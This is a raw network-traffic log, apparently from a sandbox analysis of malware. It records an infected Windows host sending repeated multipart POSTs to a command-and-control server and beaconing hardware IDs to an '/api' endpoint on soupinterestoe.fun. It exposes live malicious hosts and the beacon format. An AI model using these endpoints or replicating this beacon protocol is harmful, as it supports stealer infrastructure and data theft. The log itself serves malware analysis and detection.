Dec 27, 2023 18:13:34.096043110 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:34.170475006 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:35.032583952 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:35.398960114 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:36.204458952 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:37.881228924 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEBFBFIEHIDAAAAFHCF Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:38.920100927 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:39.225325108 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:39.908890963 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:40.098875999 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:40.995852947 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:41.087021112 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:41.976190090 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:42.127449989 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:42.784773111 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:42.979497910 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJD Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:43.784275055 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:43.886253119 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:44.742688894 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:44.824054956 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:45.703972101 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:45.775157928 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:46.657558918 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:46.809853077 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:47.678177118 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:47.809768915 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:48.782979965 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:48.954876900 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:49.781121969 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:50.322205067 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKFIIDGIEHIDGCGHII Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:51.050369978 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:51.293649912 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:52.061654091 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:52.100393057 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:52.957535982 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:52.983515024 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAA Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:53.819086075 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:56.093868017 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDBGCBGIDHCBGDHIEBF Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:57.037617922 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:57.157315016 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:57.948847055 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:58.093519926 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKEC Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:58.884294033 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:58.957879066 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:59.921905041 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:00.051466942 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:00.759393930 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:00.801142931 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:01.637902975 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:01.655949116 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGI Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:02.632596970 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:02.677627087 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:03.408863068 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:03.449465990 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:04.144864082 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:04.184174061 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:05.164793968 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:05.223871946 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:05.866153955 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:05.888497114 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:06.771640062 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:06.791723013 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:07.757936001 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:07.799422979 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:08.611509085 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:08.678976059 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:09.741203070 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:09.767842054 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:10.569902897 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:10.619878054 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:12.053345919 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:12.087311029 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:12.862107992 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:12.915802002 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:14.000495911 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:14.033853054 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:15.053251028 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:15.079796076 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:16.107619047 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:16.151817083 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:17.121407986 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:14:17.143932104 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:14:18.051526070 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:14:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:52.932403088 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:12:52.932755947 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:12:53.466675043 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=gjls9d7oj7tc31n0o46frth65k; expires=Sun, 21-Apr-2024 10:59:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=15gdsDdzLQvBW8eMcoOV9HFrH07it%2FPMYIKpCDCMTJu1AMbkNQMK0JeF6k1YLwKO%2By%2FHrqRO9IKnIvnjKan%2B6ovWxNYyId%2B68y9jLSIphDgSwR8hnmVNdwzgixKrzeTPjsjRRcs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c330e Data Raw: Data Ascii:
Dec 27, 2023 18:12:53.466687918 CET	43	IN	Data Raw: 33 39 38 36 33 31 37 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 39863171-DFW15Malformed packet data
Dec 27, 2023 18:12:53.466698885 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:53.145231962 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:12:53.145340919 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:12:53.678488016 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=maqbaa1cincqt94rn6tjqeafj8; expires=Sun, 21-Apr-2024 10:59:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:12:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KBpxFSqxKQWqF%2FWbk6xPydP4%2BTCw2OH6Wues6ei7h6H4x%2F0MRdxz%2BiAkr0eD2YYW70Mm8y27ofEqB08DqHr3aee9wT1KCm%2BBuAlXl076gI8mvbaJHh8OO1uBHBdz2Xhcs%2F8Mrbk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:12:53.678498983 CET	45	IN	Data Raw: 65 34 38 66 31 30 34 36 34 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: e48f104641-DFW15Malformed packet data
Dec 27, 2023 18:12:53.678508997 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:53.616724014 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
